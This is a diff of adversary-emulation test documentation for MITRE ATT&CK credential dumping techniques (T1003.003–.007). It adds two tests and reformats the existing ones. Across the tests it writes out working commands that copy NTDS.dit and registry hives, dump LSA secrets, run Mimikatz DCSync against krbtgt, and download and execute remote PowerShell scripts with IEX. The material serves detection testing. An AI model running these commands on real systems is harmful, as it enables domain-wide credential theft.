 **Supported Platforms:** Windows

+**auto_generated_guid:** `21c7bf80-3e8b-40fa-8f9d-f5b194ff2865`

-**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | source_path | File to shadow copy | string | c:&#92;windows&#92;ntds&#92;ntds.dit|
 | target_path | Target path of the result file | string | c:&#92;ntds.dit|
 | target_host | IP Address / Hostname you want to target | string | localhost|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
 ```


+#### Dependencies: Run with `command_prompt`!

-
-#### Dependencies:  Run with `command_prompt`!
 ##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```cmd
 wmic /node:"#{target_host}" shadowcopy list brief
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```cmd
 echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
 ```

+### Atomic Test #7: Create Volume Shadow Copy with Powershell

-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Create Volume Shadow Copy with Powershell
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `542bb97e-da53-436b-8e43-e0a7d31a6c24`

-**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | string | C:&#92;|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 (gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
 ```

+### Atomic Test #8: Create Symlink to Volume Shadow Copy

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Create Symlink to Volume Shadow Copy
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `21748c28-2793-4284-9e07-d6d028b66702`

-**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | string | C:|
 | symlink_path | symlink path | string | C:&#92;Temp&#92;vssstore|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 vssadmin.exe create shadow /for=#{drive_letter}
 mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
 ```

+### Atomic Test #9: Create Volume Shadow Copy with diskshadow

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
 This test is intended to be run on a domain controller
 An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b385996c-0e7d-4e27-95a4-aca046b119a7`

-**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 mkdir c:\exfil
 diskshadow.exe /s #{filename}
 ```

+### Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing

+This test is intended to be run on a domain Controller.

+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).

+**Supported Platforms:** Windows

+**auto_generated_guid:** `f57cb283-c131-4e2f-8a6c-363d575748b2`

-<br/>
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
+| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR #{script_url} -UseBasicParsing)
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+#### Cleanup Commands
+
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+### Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil
+
+This test is intended to be run on a domain Controller.
+
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `c7be89f7-5d06-4321-9f90-8676a77e0502`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
+| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR #{script_url} -UseBasicParsing)
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+#### Cleanup Commands
+
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
@@ -261,3 +261,60 @@ atomic_tests:
      diskshadow.exe /s #{filename}
    name: command_prompt
    elevation_required: true
+- name: Copy NTDS in low level NTFS acquisition via MFT parsing
+  auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+  supported_platforms:
+    - windows
+  input_arguments:
+    extract_path:
+      type: string
+      default: C:\Windows\Temp
+      description: Path for extracted NTDS.dit
+    script_url:
+      description: URL to UnderlayCopy script
+      type: url
+      default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR #{script_url} -UseBasicParsing)
+      Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+      Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+    name: powershell
+    elevation_required: true
+    cleanup_command: |
+      remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+      remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+
+- name: Copy NTDS in low level NTFS acquisition via fsutil
+  auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+  supported_platforms:
+    - windows
+  input_arguments:
+    extract_path:
+      type: string
+      default: C:\Windows\Temp
+      description: Path for extracted NTDS.dit
+    script_url:
+      description: URL to UnderlayCopy script
+      type: url
+      default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR #{script_url} -UseBasicParsing)
+      Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+      Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+    name: powershell
+    elevation_required: true
+    cleanup_command: |
+      remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+      remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
@@ -1,23 +1,20 @@
 # T1003.004 - OS Credential Dumping: LSA Secrets
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
-<blockquote>

-Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
+## Description from ATT&CK

-[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
+> Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
+> 
+> [Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/004)

 ## Atomic Tests

- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)
+- [Atomic Test #1: Dumping LSA Secrets](#atomic-test-1-dumping-lsa-secrets)
+- [Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2-dump-kerberos-tickets-from-lsa-using-dumperps1)

- [Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2---dump-kerberos-tickets-from-lsa-using-dumperps1)
+### Atomic Test #1: Dumping LSA Secrets

-
-<br/>
-
-## Atomic Test #1 - Dumping LSA Secrets
 Dump secrets key from Windows registry
 When successful, the dumped file will be written to $env:Temp\secrets.
 Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
@@ -25,40 +22,38 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2

 **Supported Platforms:** Windows

+**auto_generated_guid:** `55295ab0-a703-433b-9ca4-ae13807de12f`

-**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1003.004&#92;bin&#92;PsExec.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del %temp%\secrets >nul 2> nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
 Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
@@ -66,13 +61,8 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force
 ```

+### Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1
 This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
 If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
 Ref: https://github.com/MzHmO/PowershellKerberos/
@@ -80,24 +70,11 @@ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `2dfa3bff-9a27-46db-ab75-7faefdaca732`

-**auto_generated_guid:** 2dfa3bff-9a27-46db-ab75-7faefdaca732
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
 ```

-
-
-
-
-
-<br/>
@@ -1,27 +1,25 @@
 # T1003.005 - OS Credential Dumping: Cached Domain Credentials
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
-<blockquote>

-Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
+## Description from ATT&CK

-On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
+> Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
+> 
+> On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
+> 
+> On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix)
+> 
+> With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
+> 
+> Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

-On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) 
-
-With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
-
-Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/005)

 ## Atomic Tests

- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
+- [Atomic Test #1: Cached Credential Dump via Cmdkey](#atomic-test-1-cached-credential-dump-via-cmdkey)

+### Atomic Test #1: Cached Credential Dump via Cmdkey

-<br/>
-
-## Atomic Test #1 - Cached Credential Dump via Cmdkey
 List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
 Credentials listed with Cmdkey only pertain to the current user
 Passwords will not be displayed once they are stored
@@ -30,24 +28,11 @@ https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-

 **Supported Platforms:** Windows

+**auto_generated_guid:** `56506854-89d6-46a3-9804-b7fde90791f9`

-**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 cmdkey /list
 ```

-
-
-
-
-
-<br/>
@@ -1,25 +1,22 @@
 # T1003.006 - OS Credential Dumping: DCSync
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
-<blockquote>

-Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
+## Description from ATT&CK

-Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
+> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
+> 
+> Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
+> 
+> DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)

-DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/006)

 ## Atomic Tests

- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
+- [Atomic Test #1: DCSync (Active Directory)](#atomic-test-1-dcsync-active-directory)
+- [Atomic Test #2: Run DSInternals Get-ADReplAccount](#atomic-test-2-run-dsinternals-get-adreplaccount)

- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
+### Atomic Test #1: DCSync (Active Directory)

-
-<br/>
-
-## Atomic Test #1 - DCSync (Active Directory)
 Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
 Works against a remote Windows Domain Controller using the replication protocol.
 Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
@@ -27,39 +24,36 @@ Privileges required: domain admin or domain controller account (by default), or

 **Supported Platforms:** Windows

+**auto_generated_guid:** `129efd28-8497-4c87-a1b0-73b9a870ca3e`

-**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Targeted Active Directory domain | string | %userdnsdomain%|
 | user | Targeted user | string | krbtgt|
 | mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 #{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
@@ -70,13 +64,8 @@ $basePath = Split-Path $mimikatz_exe | Split-Path
 Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
 ```

+### Atomic Test #2: Run DSInternals Get-ADReplAccount

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Run DSInternals Get-ADReplAccount
 The following Atomic will run Get-ADReplAccount from DSInternals.
 Upon successful execution, domain and credentials will appear in stdout. 
 [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
@@ -84,43 +73,35 @@ https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a0bced08-3fc5-4d8b-93b7-e8344739376e`

-**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Get-ADReplAccount -All -Server #{logonserver}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: DSInternals must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 $RequiredModule = Get-Module -Name DSInternals -ListAvailable
-if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+if (-not $RequiredModule) {exit 1} else {exit 0}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Install-Module -Name DSInternals -Scope CurrentUser -Force
 ```

-
-
-
-<br/>
@@ -64,8 +64,7 @@ atomic_tests:
      DSInternals must be installed
    prereq_command: |
      $RequiredModule = Get-Module -Name DSInternals -ListAvailable
-      if (-not $RequiredModule) {exit 1}
-      if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+      if (-not $RequiredModule) {exit 1} else {exit 0}
    get_prereq_command: |
      Install-Module -Name DSInternals -Scope CurrentUser -Force
  executor:
@@ -1,51 +1,40 @@
 # T1003.007 - OS Credential Dumping: Proc Filesystem
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
-<blockquote>

-Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
+## Description from ATT&CK

-When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
+> Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
+> 
+> When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
+> 
+> If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

-If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/007)

 ## Atomic Tests

- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+- [Atomic Test #1: Dump individual process memory with sh (Local)](#atomic-test-1-dump-individual-process-memory-with-sh-local)
+- [Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2-dump-individual-process-memory-with-sh-on-freebsd-local)
+- [Atomic Test #3: Dump individual process memory with Python (Local)](#atomic-test-3-dump-individual-process-memory-with-python-local)
+- [Atomic Test #4: Capture Passwords with MimiPenguin](#atomic-test-4-capture-passwords-with-mimipenguin)

- [Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2---dump-individual-process-memory-with-sh-on-freebsd-local)
+### Atomic Test #1: Dump individual process memory with sh (Local)

- [Atomic Test #3 - Dump individual process memory with Python (Local)](#atomic-test-3---dump-individual-process-memory-with-python-local)
-
- [Atomic Test #4 - Capture Passwords with MimiPenguin](#atomic-test-4---capture-passwords-with-mimipenguin)
-
-
-<br/>
-
-## Atomic Test #1 - Dump individual process memory with sh (Local)
 Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
 copy process memory to an external file so it can be searched or exfiltrated later.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `7e91138a-8e74-456d-a007-973d67a0bb80`

-**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
 | script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
 | pid_term | Unique string to use to identify target process | string | T1003.007|

-
